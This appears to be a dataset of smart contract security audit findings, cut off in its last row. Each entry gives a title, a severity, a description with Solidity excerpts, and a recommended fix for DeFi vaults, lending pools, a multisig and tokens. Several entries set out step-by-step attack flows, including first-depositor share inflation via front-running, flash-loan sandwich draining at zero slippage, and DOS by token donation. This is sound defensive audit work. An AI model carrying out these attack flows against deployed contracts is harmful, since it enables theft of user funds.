ONE_E18;\\n```\\n" +First depositor can steal asset tokens of others,high,"The first depositor can be front run by an attacker and as a result will lose a considerable part of the assets provided. When the pool has no share supply, in `_mintInternal()`, the amount of shares to be minted is equal to the assets provided. An attacker can abuse of this situation and profit of the rounding down operation when calculating the amount of shares if the supply is non-zero.\\n```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n\\nConsider the following scenario.\\nAlice wants to deposit 2M * 1e6 USDC to a pool.\\nBob observes Alice's transaction, frontruns to deposit 1 wei USDC to mint 1 wei share, and transfers 1 M * 1e6 USDC to the pool.\\nAlice's transaction is executed, since _totalAsset = 1M * 1e6 + 1 and totalSupply = 1, Alice receives 2M * 1e6 * 1 / (1M * 1e6 + 1) = 1 share.\\nThe pool now has 3M*1e6 +1 assets and distributed 2 shares. Bob profits 0.5 M and Alice loses 0.5 M USDC.","When _totalSupply == 0, send the first min liquidity LP tokens to the zero address to enable share dilution Another option is to use the ERC4626 implementation(https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/extensions/ERC4626.sol#L199C14-L208) from OZ.",,"```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n" +The attacker can use larger dust when opening a position to perform griefing attacks,high,"When opening a position, unused assets are sent to dustVault as dust, but since these dust are not subtracted from inputAmt, they are included in the calculation of positionOpenUSDValueE36, resulting in a small netPnLE36, which can be used by an attacker to perform a griefing attack.\\n```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\n",Consider subtracting dust from inputAmt when opening a position.,,```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\n +An attacker can increase liquidity to the position's UniswapNFT to prevent the position from being closed,high,"UniswapV3NPM allows the user to increase liquidity to any NFT.\\n```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n\\nWhen closing a position, in `_redeemPosition()`, only the initial liquidity of the NFT will be decreased, and then the NFT will be burned.\\n```\\n function _redeemPosition(\\n address _user, uint _posId\\n ) internal override returns (address[] memory rewardTokens, uint[] memory rewardAmts) {\\n address _positionManager = positionManager;\\n uint128 collAmt = IUniswapV3PositionManager(_positionManager).getPositionCollAmt(_user, \\n _posId);\\n // 1. take lp & extra coll tokens from lending proxy\\n _takeAllCollTokens(_positionManager, _user, _posId, address(this));\\n UniV3ExtraPosInfo memory extraPosInfo = IUniswapV3PositionManager(_positionManager)\\n .getDecodedExtraPosInfo(_user, _posId);\\n address _uniswapV3NPM = uniswapV3NPM; // gas saving\\n // 2. remove underlying tokens from lp (internal remove in NPM)\\n IUniswapV3NPM(_uniswapV3NPM).decreaseLiquidity(\\n IUniswapV3NPM.DecreaseLiquidityParams({\\n tokenId: extraPosInfo.uniV3PositionId,liquidity: collAmt, amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n })\\n );\\n // rest of code\\n // 4. burn LP position\\n IUniswapV3NPM(_uniswapV3NPM).burn(extraPosInfo.uniV3PositionId);\\n }\\n```\\n\\nIf the liquidity of the NFT is not 0, burning will fail.\\n```\\n function burn(uint256 tokenId) external payable override isAuthorizedForToken(tokenId) {\\n Position storage position = _positions[tokenId];\\n require(position.liquidity == 0 && position.tokensOwed0 == 0 && position.tokensOwed1 == 0,'Not cleared');\\n delete _positions[tokenId];\\n _burn(tokenId);\\n }\\n```\\n\\nThis allows an attacker to add 1 wei liquidity to the position's NFT to prevent the position from being closed, and later when the position expires, the attacker can liquidate it.","Consider decreasing the actual liquidity(using uniswapV3NPM.positions to get it) of the NFT in `_redeemPosition()`, instead of the initial liquidity",,"```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n" +SwapHelper.getCalldata should check whitelistedRouters[_router],medium,"`SwapHelper.getCalldata()` returns data for swap based on the input, and uses whitelistedRouters to limit the _router param. The issue here is that when `setWhitelistedRouters()` sets the _routers state to false, it does not reset the data in routerTypes and swapInfos, which results in the router still being available in `getCalldata()`. As a result, users can still swap with invalid router data.\\n```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n",Consider checking whitelistedRouters[_router] in SwapHelper.getCalldata(),,"```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n" +The swap when closing a position does not consider shareProfitAmts,medium,"When closing a position, token swap is performed to ensure that the closer can repay the debt, for example, when operation == EXACT_IN, tokens of borrowAmt are required to be excluded from the swap, and when operation == EXACT_OUT, tokens of borrowAmt are required to be swapped. The issue here is that the closer needs to pay not only the borrowAmt but also the shareProfitAmts, which causes the closure to fail when percentSwapE18 = 100% due to insufficient tokens. Although the closer can adjust the percentSwapE18 to make the closure successful, it greatly increases the complexity.\\n```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\n",Consider taking shareProfitAmts into account when calculating swapAmt,,```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\n +"The freeze mechanism reduces the borrowableAmount, which reduces Lender's yield",medium,"The contract has two freeze intervals, mintFreezeInterval and freezeBuckets.interval, the former to prevent users from making flash accesses and the latter to prevent borrowers from running out of funds. Both freeze intervals are applied when a user deposits, and due to the difference in unlocking time, it significantly reduces borrowableAmount and thus reduces Lender's yield.\\n```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n\\nConsider freezeBuckets.interval == mintFreezeInterval = 1 day, 100 ETH in the LendingPool, and borrowableAmount = 100 ETH. At day 0 + 1s, Alice deposits 50 ETH, borrowableAmount = 150 ETH**-** lockedAmount(50 ETH) = 100 ETH, the 50 ETH frozen in freezeBuckets will be unlocked on day 2, while unfreezeTime[alice] = day 1 + 1s. At day 1 + 1s, unfreezeTime[Alice] is reached, Alice can withdraw 50 ETH, borrowableAmount = 100 ETH - LockedAmount(50 ETH) = 50 ETH. If Bob wants to borrow the available funds in the Pool at this time, Bob can only borrow 50 ETH, while the available funds are actually 100 ETH, which will reduce Lender's yield by half. At day 2 + 1s, freezeBuckets is unfrozen and borrowableAmount = 100 ETH -LockedAmount(0 ETH) = 100 ETH.","Consider making mintFreezeInterval >= 2 * freezeBuckets.interval, which makes unfreezeTime greater than the unfreeze time of freezeBuckets.",,"```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n" +A malicious operator can drain the vault funds in one transaction,high,"The vault operator can swap tokens using the `trade()` function. They pass the following structure for each trade:\\n```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n\\nNotably, receiveAmtMin is used to guarantee acceptable slippage. An operator can simply pass 0 to make sure the trade is executed. This allows an operator to steal all the funds in the vault by architecting a sandwich attack.\\nFlashloan a large amount of funds\\nSkew the token proportions in a pool which can be used for trading, by almost completely depleting the target token.\\nPerform the trade at >99% slippage\\nSell target tokens for source tokens on the manipulated pool, returning to the original ratio.\\nPay off the flashloan, and keep the tokens traded at 99% slippage. In fact, this attack can be done in one TX, different to most sandwich attacks.",The contract should enforce sensible slippage parameters.,,```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n +A malicious operator can steal all user deposits,high,"In the Orbital architecture, each Vault user has a numerator which represents their share of the vault holdings. The denominator is by design the sum of all numerators of users, an invariant kept at deposits and withdrawals. For maximum precision, the denominator should be a very large value. Intuitively, numerators could be spread across different users without losing precision. The critical calculations occur in these lines in deposit():\\n```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n ""invalid sumDenoms"");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. \\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n\\nIn the initial deposit, Vault sums all token initialDenominators to get the final denominator. It is assumed that the vault will never have this amount in total balances (each token denominator is worth around $100m dollars).\\nIn any other deposit, the deltaN (numerator) credited to the depositor is (denominator * deposit amount / existing balance). When denominator is huge, this calculation is highly precise. However, when denominator is 1, a serious issue oc**curs. If user's deposit amount is one wei smaller than existing balance, deltaN would be zero. This property has lead to the well-known ERC4626 inflation attack, where an attacker donates (sends directly to the contract) an amount so that the following deposit is consumed without any shares given to the user. In fact, it is possible to reduce the denominator to 1 and resurrect that attack. The root cause is that the initial deposit denominator is not linear to the deposit amount. Consider the attack flow below, done by a malicious operator:\\nDeploy an ETH/BTC pool\\nFlash loan $100mm in ETH and BTC each\\nPerform an initial deposit of $100mm in ETH/BTC\\nFrom another account, deposit 1 wei ETH / BTC -> receive 1 deltaN\\nWithdraw 100% as operator, reducing denominator to 1.\\nPay off flash loan\\nWait for victim deposits\\nWhen a deposit arrives at the mempool, frontrun with a donation of an equivalent amount. The victim will not receive any shares ( numerator).\\nAny future deposits can be frontran again. Any deposit of less than the current balance will be lost.","Consider checking that user's received deltaN is reasonable. Calculate the expected withdrawable value (deltaN / denominator * balance), and verify that is close enough to the deposited amount.",,"```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n ""invalid sumDenoms"");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. \\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n" +Removing a trade path in router will cause serious data corruption,medium,"The RouterInfo represents a single UniV3-compatible router which supports a list of token paths. It uses the following data structures:\\n```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n\\n```\\n struct listInfo {\\n bool allowed;\\n uint256 listPosition;\\n }\\n struct pair {\\n address token0;\\n address token1;\\n uint256 numPathsAllowed;\\n }\\n```\\n\\nWhen an admin specifies a new path from token0 to token1, `_increasePairPaths()` is called.\\n```\\n function _increasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n if (!LI.allowed){\\n LI.allowed = true;\\n LI.listPosition = allowedPairsList.length;\\n allowedPairsList.push(pair(token0, token1, 0));\\n }\\n allowedPairsList[LI.listPosition].numPathsAllowed++;\\n }\\n```\\n\\nWhen a path is removed, the complementary function is called.\\n```\\n function _decreasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n require(LI.allowed, ""RouterInfo: pair not allowed"");\\n allowedPairsList[LI.listPosition].numPathsAllowed--;\\n if (allowedPairsList[LI.listPosition].numPathsAllowed == 0){\\n allowedPairsList[LI.listPosition] = \\n allowedPairsList[allowedPairsList.length - 1];\\n allowedPairsList.pop();\\n LI.allowed = false;\\n }\\n }\\n```\\n\\nWhen the last path is removed, the contract reuses the index of the removed pair, to store the last pair in the list. It then removes the last pair, having already copied it. The issue is that the corresponding listInfo structure is not updated, to keep track of index in the pairs list. Future usage of the last pair will use a wrong index, which at this moment, is over the array bounds. When a new pair will be created, it will share the index with the corrupted pair. This can cause a variety of serious issues. For example, it will not be possible to remove paths from the corrupted pair until a new pair is created, at which point the new pair will have a wrong numPathsAllowed as it is shared.","Update the listPosition member of the last pair in the list, before repositioning it.",,```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n +Attacker can DOS deposit transactions due to strict verifications,medium,"When users deposit funds to the Vault, it verifies that the proportion between the tokens inserted to the vault matches the current vault token balances.\\n```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), ""ratios don't match"");\\n```\\n\\nThe essential part of the check is below:\\n```\\n for (uint256 i = 0; i < sourceRatios.length; i++) {\\n // if (targetRatios[i] != (targetRatios[greatestIndex] * \\n sourceRatios[i]) / greatest) {\\n if (targetRatios[i] != \\n Arithmetic.overflowResistantFraction(targetRatios[greatestIndex], sourceRatios[i], greatest)) {\\n return false;\\n }\\n }\\n```\\n\\nThe exact logic here is not important, but note that a small change in the balance of one of the vault tokens will affect the expected number of tokens that need to be inserted to maintain correct ratio. The exact amounts to be deposited are passed as targetRatios, and sourceRatios is the current balances. Therefore, an attacker can directly transfer a negligible amount of some vault token to the contract to make the amount the user specified in targetRatios not line up with the expected proportion. As a result, the deposit would revert. Essentially it is an abuse of the over-granular verification of ratios, leading to a DOS of any deposit in the mempool.",Loosen the restriction on deposit ratios. A DOS attack should cost an amount that the vault creditors would be happy to live with.,,"```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), ""ratios don't match"");\\n```\\n" +User deposits can fail despite using the correct method for calculation of deposit amounts,medium,"Users can use the `getAmtsNeededForDeposit()` function to get the amount of tokens that maintain the desired proportion for vault deposits. It will perform a calculation very similar to the one in `ratiosMatch()`, which will verify the deposit.\\n```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n\\nHowever, a difference between the verification function and the getter function is that the getter receives any reference token, while the verification will use proportions based on the deposit amount in the largest balance in the vault. Indeed, these fractions may differ by a small amount. This could cause the `getAmtsNeededForDeposit()` function to respond with values which will not be accepted at deposit, since they will be rounded differently.",Calculation amounts needed using the ratio between largest balance and the deposit amount. This would line up the numbers as verification would expect.,,"```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n" +Several popular ERC20 tokens are incompatible with the vault due to MAX approve,low,"There are several instances where the vault approves use of funds to the manager or a trade router. It will set approval to MAX_UINT256.\\n```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n\\nThe issue is that there are several popular tokens(https://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers) (UNI, COMP and others) which do not support allowances of above UINT_96. The contract will not be able to interoperate with them.","Consider setting allowance to UINT_96. Whenever the allowance is consumed, perform re-approval up to UINT_96.",,"```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n" +Attacker can freeze deposits and withdrawals indefinitely by submitting a bad withdrawal,high,"Users request to queue a withdrawal using the function below in Vault.\\n```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), ""ERROR: Invalid token"");\\n require(_amountMLP != 0, ""ERROR: Invalid amount"");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), ""Withdraw amount > amount MLP"");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n\\nNotice that the function only validates that the user has a sufficient LP token balance to withdraw at the moment of execution. After it is queued up, a user can move their tokens to another wallet. Later in `_settleRequests()`, the Vault will attempt to burn user's tokens:\\n```\\n // Burn moazic LP token.\\n MozaicLP(mozLP).burn(request.user, _mlpToBurn);\\n```\\n\\nThis would revert and block any other settlements from occurring. Therefore, users can block the entire settlement process by requesting a tiny withdrawal amount in every epoch and moving funds to another wallet.","Vault should take custody of user's LP tokens when they request withdrawals. If the entire withdrawal cannot be satisfied, it can refund some tokens back to the user.",,"```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), ""ERROR: Invalid token"");\\n require(_amountMLP != 0, ""ERROR: Invalid amount"");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), ""Withdraw amount > amount MLP"");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n" +Removal of Multisig members will corrupt data structures,medium,"The Mozaic Multisig (the senate) can remove council members using the TYPE_DEL_OWNER operation:\\n```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, ""Invalid owner address"");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n\\nThe code finds the owner's index in the councilMembers array, copies all subsequent members downwards, and deletes the last element. Finally, it deletes the isCouncil[_owner] entry. The issue is actually in the contains() function.\\n```\\n function contains(address _owner) public view returns (uint) {\\n for (uint i = 1; i <= councilMembers.length; i++) {\\n if (councilMembers[i - 1] == _owner) {\\n return i;\\n }\\n }\\n return 0;\\n }\\n```\\n\\nThe function returns the index following the owner's index. Therefore, the intended owner is not deleted from councilMembers, instead the one after it is. The `submitProposal()` and `confirmTransaction()` privileged functions will not be affected by the bug, as they filter by isCouncil. However, the corruption of councilMembers will make deleting the member following the currently deleted owner fail, as deletion relies on finding the member in councilMembers.",Fix the `contains()` function to return the correct index of _owner,,"```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, ""Invalid owner address"");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n" +Attacker could abuse victim's vote to pass their own proposal,medium,"Proposals are created using submitProposal():\\n```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n\\nAfter submission, council members approve them by calling confirmTransaction():\\n```\\n function confirmTransaction(uint256 _proposalId) public onlyCouncil \\n notConfirmed(_proposalId) {\\n confirmations[_proposalId][msg.sender] = true;\\n proposals[_proposalId].confirmation += 1;\\n emit Confirmation(_proposalId, msg.sender);\\n }\\n```\\n\\nNotably, the _proposalId passed to `confirmTransaction()` is simply the proposalCount at time of submission. This design allows the following scenario to occur:\\nUser A submits proposal P1\\nUser B is interested in the proposal and confirms it\\nAttacker submits proposal P2\\nA blockchain re-org occurs. Submission of P1 is dropped in place of P2.\\nUser B's confirmation is applied on top of the re-orged blockchain. Attacker gets their vote. We've seen very large re-orgs in top blockchains such as Polygon, so this threat remains a possibility to be aware of.","Calculate proposalId as a hash of the proposal properties. This way, votes cannot be misdirected.",,"```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n" +MozToken will have a much larger fixed supply than intended.,medium,"MozToken is planned to be deployed on all supported chains. Its total supply will be 1B. However, its constructor will mint 1B tokens on each deployment.\\n```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(""Mozaic Token"", ""MOZ"", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\n","Pass the minted supply as a parameter. Only on the main chain, mint 1B tokens.",,"```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(""Mozaic Token"", ""MOZ"", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\n" +Theoretical reentrancy attack when TYPE_MINT_BURN proposals are executed,low,"The senate can pass a proposal to mint or burn tokens.\\n```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n\\nNote that the proposal is only marked as executed at the end of execution, but execution is checked at the start of the function.\\n```\\n function execute(uint256 _proposalId) public onlyCouncil {\\n require(proposals[_proposalId].executed == false, ""Error: \\n Proposal already executed."");\\n require(proposals[_proposalId].confirmation >= threshold, ""Error: Not enough confirmations."");\\n```\\n\\nInteraction with tokens should generally be assumed to grant arbitrary call execution to users. If the mint or `burn()` calls call `execute()` again, the proposal will be executed twice, resulting in double the amount minted or burned. Specifically for XMoz, it is not anticipated to yield execution to the to address, so the threat remains theoretical.","Follow the Check-Effects-Interactions design pattern, mark the function as executed at the start.",,"```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n" +XMozToken permits transfers from non-whitelisted addresses,low,"The XMozToken is documented to forbid transfers except from whitelisted addresses or mints.\\n```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), ""transfer: not allowed"");\\n }\\n```\\n\\nHowever, as can be seen, non-whitelisted users can still transfer tokens, so long as it is to whitelisted destinations.","Remove the additional check in `_beforeTokenTransfer()`, or update the documentation accordingly.",,"```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), ""transfer: not allowed"");\\n }\\n```\\n" +XMozToken cannot be added to its own whitelist,low,"By design, XMozToken should always be in the whitelist. However, `updateTransferWhitelist()` implementation forbids both removal and insertion of XMozToken to the whitelist.\\n```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), ""updateTransferWhitelist: \\n Cannot remove xMoz from whitelist"");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\n",Move the require statement into the else clause.,,"```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), ""updateTransferWhitelist: \\n Cannot remove xMoz from whitelist"");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\n" +User fee token balance can be drained in a single operation by a malicious bot,high,"In `_buildFeeExecutable()`, BrahRouter calculates the total fee charged to the wallet. It uses tx. gas price to get the gas price specified by the bot.\\n```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * 